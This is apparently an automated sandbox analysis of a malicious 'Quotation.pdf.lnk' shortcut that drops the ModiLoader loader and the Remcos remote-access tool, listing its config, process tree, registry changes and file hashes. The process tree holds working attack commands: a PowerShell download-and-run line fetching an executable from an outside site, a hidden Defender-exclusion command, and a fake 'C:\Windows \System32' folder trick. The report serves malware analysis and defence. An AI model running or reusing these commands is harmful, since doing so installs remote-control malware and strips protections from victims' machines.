Analysis
-
max time kernel
189s -
max time network
188s -
platform
windows10-2004_x64 -
resource
win10v2004-20230221-en -
resource tags
arch:x64arch:x86image:win10v2004-20230221-enlocale:en-usos:windows10-2004-x64system -
submitted
21-02-2023 09:10
Static task
static1
Behavioral task
behavioral1
Sample
Quotation.pdf.lnk
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
Quotation.pdf.lnk
Resource
win10v2004-20230221-en
General
-
Target
Quotation.pdf.lnk
-
Size
1006B
-
MD5
aa8836fa3879074748f6dca63476aba9
-
SHA1
783e61d2d41d5450560bb7adb3c7a641c0e8507d
-
SHA256
9a97525c9e38f212f2d0a25c22466ae0001533c1af582c111544db9df3fd8001
-
SHA512
1f7c496b8131a6f1282705be852fb91b0af693a5501f0ed934d0986969f5c165665e7d2bfe7d55947457d4c7dfb06727028fa51a7337633cfb504afb1f326017
Malware Config
Extracted
remcos
RemoteHost
hallowed247.duckdns.org:9150
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
Google
-
mouse_option
false
-
mutex
Rmc-PMVOI7
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
startup_value
Remcos
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
ModiLoader Second Stage 1 IoCs
Processes:
resource yara_rule behavioral2/memory/3740-167-0x0000000002430000-0x000000000245C000-memory.dmp modiloader_stage2 -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 6 3068 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
file.execmd.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation file.exe Key value queried \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation cmd.exe -
Executes dropped EXE 3 IoCs
Processes:
file.exeeasinvoker.exefxwvcivD.pifpid process 3740 file.exe 4140 easinvoker.exe 4932 fxwvcivD.pif -
Loads dropped DLL 1 IoCs
Processes:
easinvoker.exepid process 4140 easinvoker.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
file.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Dvicvwxf = "C:\\Users\\Public\\Libraries\\fxwvcivD.url" file.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
AcroRd32.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AcroRd32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz AcroRd32.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
xcopy.exexcopy.exexcopy.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe -
Processes:
AcroRd32.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION AcroRd32.exe -
Modifies registry class 1 IoCs
Processes:
file.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings file.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exefile.exepid process 3068 powershell.exe 3068 powershell.exe 3740 file.exe 3740 file.exe 3740 file.exe 3740 file.exe 3740 file.exe 3740 file.exe 3740 file.exe 3740 file.exe 3740 file.exe 3740 file.exe 3740 file.exe 3740 file.exe 3740 file.exe 3740 file.exe 3740 file.exe 3740 file.exe 3740 file.exe 3740 file.exe 3740 file.exe 3740 file.exe 3740 file.exe 3740 file.exe 3740 file.exe 3740 file.exe 3740 file.exe 3740 file.exe 3740 file.exe 3740 file.exe 3740 file.exe 3740 file.exe 3740 file.exe 3740 file.exe 3740 file.exe 3740 file.exe 3740 file.exe 3740 file.exe 3740 file.exe 3740 file.exe 3740 file.exe 3740 file.exe 3740 file.exe 3740 file.exe 3740 file.exe 3740 file.exe 3740 file.exe 3740 file.exe 3740 file.exe 3740 file.exe 3740 file.exe 3740 file.exe 3740 file.exe 3740 file.exe 3740 file.exe 3740 file.exe 3740 file.exe 3740 file.exe 3740 file.exe 3740 file.exe 3740 file.exe 3740 file.exe 3740 file.exe 3740 file.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
fxwvcivD.pifpid process 4932 fxwvcivD.pif -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 3068 powershell.exe Token: SeDebugPrivilege 2472 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
AcroRd32.exepid process 348 AcroRd32.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
Processes:
AcroRd32.exepid process 348 AcroRd32.exe 348 AcroRd32.exe 348 AcroRd32.exe 348 AcroRd32.exe 348 AcroRd32.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exepowershell.exefile.execmd.exeeasinvoker.execmd.exeAcroRd32.exeRdrCEF.exedescription pid process target process PID 808 wrote to memory of 3068 808 cmd.exe powershell.exe PID 808 wrote to memory of 3068 808 cmd.exe powershell.exe PID 808 wrote to memory of 3068 808 cmd.exe powershell.exe PID 3068 wrote to memory of 3740 3068 powershell.exe file.exe PID 3068 wrote to memory of 3740 3068 powershell.exe file.exe PID 3068 wrote to memory of 3740 3068 powershell.exe file.exe PID 3740 wrote to memory of 348 3740 file.exe AcroRd32.exe PID 3740 wrote to memory of 348 3740 file.exe AcroRd32.exe PID 3740 wrote to memory of 348 3740 file.exe AcroRd32.exe PID 3740 wrote to memory of 4848 3740 file.exe cmd.exe PID 3740 wrote to memory of 4848 3740 file.exe cmd.exe PID 3740 wrote to memory of 4848 3740 file.exe cmd.exe PID 4848 wrote to memory of 4044 4848 cmd.exe cmd.exe PID 4848 wrote to memory of 4044 4848 cmd.exe cmd.exe PID 4848 wrote to memory of 4044 4848 cmd.exe cmd.exe PID 4848 wrote to memory of 1892 4848 cmd.exe xcopy.exe PID 4848 wrote to memory of 1892 4848 cmd.exe xcopy.exe PID 4848 wrote to memory of 1892 4848 cmd.exe xcopy.exe PID 4848 wrote to memory of 3732 4848 cmd.exe cmd.exe PID 4848 wrote to memory of 3732 4848 cmd.exe cmd.exe PID 4848 wrote to memory of 3732 4848 cmd.exe cmd.exe PID 4848 wrote to memory of 2140 4848 cmd.exe xcopy.exe PID 4848 wrote to memory of 2140 4848 cmd.exe xcopy.exe PID 4848 wrote to memory of 2140 4848 cmd.exe xcopy.exe PID 4848 wrote to memory of 4304 4848 cmd.exe cmd.exe PID 4848 wrote to memory of 4304 4848 cmd.exe cmd.exe PID 4848 wrote to memory of 4304 4848 cmd.exe cmd.exe PID 4848 wrote to memory of 5076 4848 cmd.exe xcopy.exe PID 4848 wrote to memory of 5076 4848 cmd.exe xcopy.exe PID 4848 wrote to memory of 5076 4848 cmd.exe xcopy.exe PID 4848 wrote to memory of 4140 4848 cmd.exe easinvoker.exe PID 4848 wrote to memory of 4140 4848 cmd.exe easinvoker.exe PID 4140 wrote to memory of 3576 4140 easinvoker.exe cmd.exe PID 4140 wrote to memory of 3576 4140 easinvoker.exe cmd.exe PID 4848 wrote to memory of 1728 4848 cmd.exe PING.EXE PID 4848 wrote to memory of 1728 4848 cmd.exe PING.EXE PID 4848 wrote to memory of 1728 4848 cmd.exe PING.EXE PID 3576 wrote to memory of 2472 3576 cmd.exe powershell.exe PID 3576 wrote to memory of 2472 3576 cmd.exe powershell.exe PID 348 wrote to memory of 2208 348 AcroRd32.exe RdrCEF.exe PID 348 wrote to memory of 2208 348 AcroRd32.exe RdrCEF.exe PID 348 wrote to memory of 2208 348 AcroRd32.exe RdrCEF.exe PID 2208 wrote to memory of 3040 2208 RdrCEF.exe RdrCEF.exe PID 2208 wrote to memory of 3040 2208 RdrCEF.exe RdrCEF.exe PID 2208 wrote to memory of 3040 2208 RdrCEF.exe RdrCEF.exe PID 2208 wrote to memory of 3040 2208 RdrCEF.exe RdrCEF.exe PID 2208 wrote to memory of 3040 2208 RdrCEF.exe RdrCEF.exe PID 2208 wrote to memory of 3040 2208 RdrCEF.exe RdrCEF.exe PID 2208 wrote to memory of 3040 2208 RdrCEF.exe RdrCEF.exe PID 2208 wrote to memory of 3040 2208 RdrCEF.exe RdrCEF.exe PID 2208 wrote to memory of 3040 2208 RdrCEF.exe RdrCEF.exe PID 2208 wrote to memory of 3040 2208 RdrCEF.exe RdrCEF.exe PID 2208 wrote to memory of 3040 2208 RdrCEF.exe RdrCEF.exe PID 2208 wrote to memory of 3040 2208 RdrCEF.exe RdrCEF.exe PID 2208 wrote to memory of 3040 2208 RdrCEF.exe RdrCEF.exe PID 2208 wrote to memory of 3040 2208 RdrCEF.exe RdrCEF.exe PID 2208 wrote to memory of 3040 2208 RdrCEF.exe RdrCEF.exe PID 2208 wrote to memory of 3040 2208 RdrCEF.exe RdrCEF.exe PID 2208 wrote to memory of 3040 2208 RdrCEF.exe RdrCEF.exe PID 2208 wrote to memory of 3040 2208 RdrCEF.exe RdrCEF.exe PID 2208 wrote to memory of 3040 2208 RdrCEF.exe RdrCEF.exe PID 2208 wrote to memory of 3040 2208 RdrCEF.exe RdrCEF.exe PID 2208 wrote to memory of 3040 2208 RdrCEF.exe RdrCEF.exe PID 2208 wrote to memory of 3040 2208 RdrCEF.exe RdrCEF.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\Quotation.pdf.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" Invoke-WebRequest -Uri 'https://silverline.com.sg/new/Dvicvwxfouxvgm.exe' -OutFile $env:temp\file.exe; start $env:temp\file.exe2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Public\xuofxwvcivD.pdf"4⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=165140435⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=874DB2DCD48CB9244EA8349185333AE1 --mojo-platform-channel-handle=1728 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:26⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=D3991AD85A2E7360C99780FCB4D50B0C --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=D3991AD85A2E7360C99780FCB4D50B0C --renderer-client-id=2 --mojo-platform-channel-handle=1720 --allow-no-sandbox-job /prefetch:16⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=DFFC77C863A9CE79C255D94C8FA2AD7B --mojo-platform-channel-handle=2300 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:26⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=331DCE9BAA236FA55C4CC1CF984F9B22 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=331DCE9BAA236FA55C4CC1CF984F9B22 --renderer-client-id=5 --mojo-platform-channel-handle=2412 --allow-no-sandbox-job /prefetch:16⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=76B003146BD8ECB70EA1DB900F20BFED --mojo-platform-channel-handle=2552 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:26⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=90F8E4E4E1E82F2C817B97F38258A62C --mojo-platform-channel-handle=2764 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:26⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\DvicvwxfO.bat" "4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ECHO F"5⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy "easinvoker.exe" "C:\Windows \System32\" /K /D /H /Y5⤵
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ECHO F"5⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy "netutils.dll" "C:\Windows \System32\" /K /D /H /Y5⤵
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ECHO F"5⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy "KDECO.bat" "C:\Windows \System32\" /K /D /H /Y5⤵
- Enumerates system info in registry
-
C:\Windows \System32\easinvoker.exe"C:\Windows \System32\easinvoker.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\windows \system32\KDECO.bat""6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"7⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 65⤵
- Runs ping.exe
-
C:\Users\Public\Libraries\fxwvcivD.pifC:\Users\Public\Libraries\fxwvcivD.pif4⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
16KB
MD5f4827428aa911377d0795484bebefeb1
SHA12c71e430d31fb4715532be409ba4c8465afd0763
SHA25622c28ec46917b661b4e73428178e9548d3a69d0b31a572afddb53cd97632165c
SHA51210bd0cdd89f33a234696d9abac9e638c6a2b6f00492fe64514d8a7c158598c49aaee08af90e78fc8379b6bdac3196ad756a515868cdd23b532b10fc9996b01ef
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kwq53gdn.cue.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\file.exeFilesize
854KB
MD5b2d368435d5896419751add4cc338fc4
SHA173d519958f92ae9b6869b158d50e5f06e4bc4bb8
SHA25637e6e8c41257b40d4f636227552fd2551123ada208dde4fd71ca34e8ec62cf92
SHA512266d949ece7d12d33bd3516df27ae3eabd574d236ee3ebc20d3d77d860fcbb6e7b3bcd92977d2eba5f2a4c1b1c0c2b7e782d34576f8cf82bc2591715523fc494
-
C:\Users\Admin\AppData\Local\Temp\file.exeFilesize
854KB
MD5b2d368435d5896419751add4cc338fc4
SHA173d519958f92ae9b6869b158d50e5f06e4bc4bb8
SHA25637e6e8c41257b40d4f636227552fd2551123ada208dde4fd71ca34e8ec62cf92
SHA512266d949ece7d12d33bd3516df27ae3eabd574d236ee3ebc20d3d77d860fcbb6e7b3bcd92977d2eba5f2a4c1b1c0c2b7e782d34576f8cf82bc2591715523fc494
-
C:\Users\Admin\AppData\Local\Temp\file.exeFilesize
854KB
MD5b2d368435d5896419751add4cc338fc4
SHA173d519958f92ae9b6869b158d50e5f06e4bc4bb8
SHA25637e6e8c41257b40d4f636227552fd2551123ada208dde4fd71ca34e8ec62cf92
SHA512266d949ece7d12d33bd3516df27ae3eabd574d236ee3ebc20d3d77d860fcbb6e7b3bcd92977d2eba5f2a4c1b1c0c2b7e782d34576f8cf82bc2591715523fc494
-
C:\Users\Public\Libraries\DvicvwxfO.batFilesize
411B
MD555aba243e88f6a6813c117ffe1fa5979
SHA1210b9b028a4b798c837a182321dbf2e50d112816
SHA2565a11c5641c476891aa30e7ecfa57c2639f6827d8640061f73e9afec0adbbd7d2
SHA51268009c4c9bbea75a3bfa9f79945d30957a95691ea405d031b4ca7f1cb47504bbc768fcae59173885743ad4d6cfdd2313c3fe0acb515e34e5c809ecdc7f45e307
-
C:\Users\Public\Libraries\KDECO.batFilesize
155B
MD5213c60adf1c9ef88dc3c9b2d579959d2
SHA1e4d2ad7b22b1a8b5b1f7a702b303c7364b0ee021
SHA25637c59c8398279916cfce45f8c5e3431058248f5e3bef4d9f5c0f44a7d564f82e
SHA512fe897d9caa306b0e761b2fd61bb5dc32a53bfaad1ce767c6860af4e3ad59c8f3257228a6e1072dab0f990cb51c59c648084ba419ac6bc5c0a99bdffa569217b7
-
C:\Users\Public\Libraries\easinvoker.exeFilesize
128KB
MD5231ce1e1d7d98b44371ffff407d68b59
SHA125510d0f6353dbf0c9f72fc880de7585e34b28ff
SHA25630951db8bfc21640645aa9144cfeaa294bb7c6980ef236d28552b6f4f3f92a96
SHA512520887b01bda96b7c4f91b9330a5c03a12f7c7f266d4359432e7bacc76b0eef377c05a4361f8fa80ad0b94b5865699d747a5d94a2d3dcdb85dabf5887bb6c612
-
C:\Users\Public\Libraries\fxwvcivD.pifFilesize
66KB
MD5c116d3604ceafe7057d77ff27552c215
SHA1452b14432fb5758b46f2897aeccd89f7c82a727d
SHA2567bcdc2e607abc65ef93afd009c3048970d9e8d1c2a18fc571562396b13ebb301
SHA5129202a00eeaf4c5be94de32fd41bfea40fc32d368955d49b7bad2b5c23c4ebc92dccb37d99f5a14e53ad674b63f1baa6efb1feb27225c86693ead3262a26d66c6
-
C:\Users\Public\Libraries\fxwvcivD.pifFilesize
66KB
MD5c116d3604ceafe7057d77ff27552c215
SHA1452b14432fb5758b46f2897aeccd89f7c82a727d
SHA2567bcdc2e607abc65ef93afd009c3048970d9e8d1c2a18fc571562396b13ebb301
SHA5129202a00eeaf4c5be94de32fd41bfea40fc32d368955d49b7bad2b5c23c4ebc92dccb37d99f5a14e53ad674b63f1baa6efb1feb27225c86693ead3262a26d66c6
-
C:\Users\Public\Libraries\netutils.dllFilesize
110KB
MD5b375e74a145c45d07190212e9157e5f8
SHA159d3de7748e1090ce95523601224ce5ab6cc4a3a
SHA2566ec341496722bfdde504d430a7ece494701a9369b1fa5376ec488a77ab3c1744
SHA512859737afb6108f131c0ac35560878359505c4f7fdd01ce468c04b15848df71f70987552a831a43ce948a37c9b1d6a434ff7f6fb5946f3730049b924d5b462ef0
-
C:\Users\Public\xuofxwvcivD.pdfFilesize
143KB
MD5788eaf2c21e3b1bb09f82aa767d41da2
SHA1c01a8799b1fa61aff5ea32e95b0cf85ac7ae7cb4
SHA256009561734bd2ba113377043d5eee8e5fec9185100aef254f149ff7c20b20c94f
SHA512bb6160addb93e3500f94e09dba6c41f92b100d9e2fac86b5c97aa0c84e44f1238caa2db49f3fb2d5426bc9e18f0ae3cdf49efe64a59a9e2162480262ac3f9bfa
-
C:\Windows \System32\easinvoker.exeFilesize
128KB
MD5231ce1e1d7d98b44371ffff407d68b59
SHA125510d0f6353dbf0c9f72fc880de7585e34b28ff
SHA25630951db8bfc21640645aa9144cfeaa294bb7c6980ef236d28552b6f4f3f92a96
SHA512520887b01bda96b7c4f91b9330a5c03a12f7c7f266d4359432e7bacc76b0eef377c05a4361f8fa80ad0b94b5865699d747a5d94a2d3dcdb85dabf5887bb6c612
-
C:\Windows \System32\easinvoker.exeFilesize
128KB
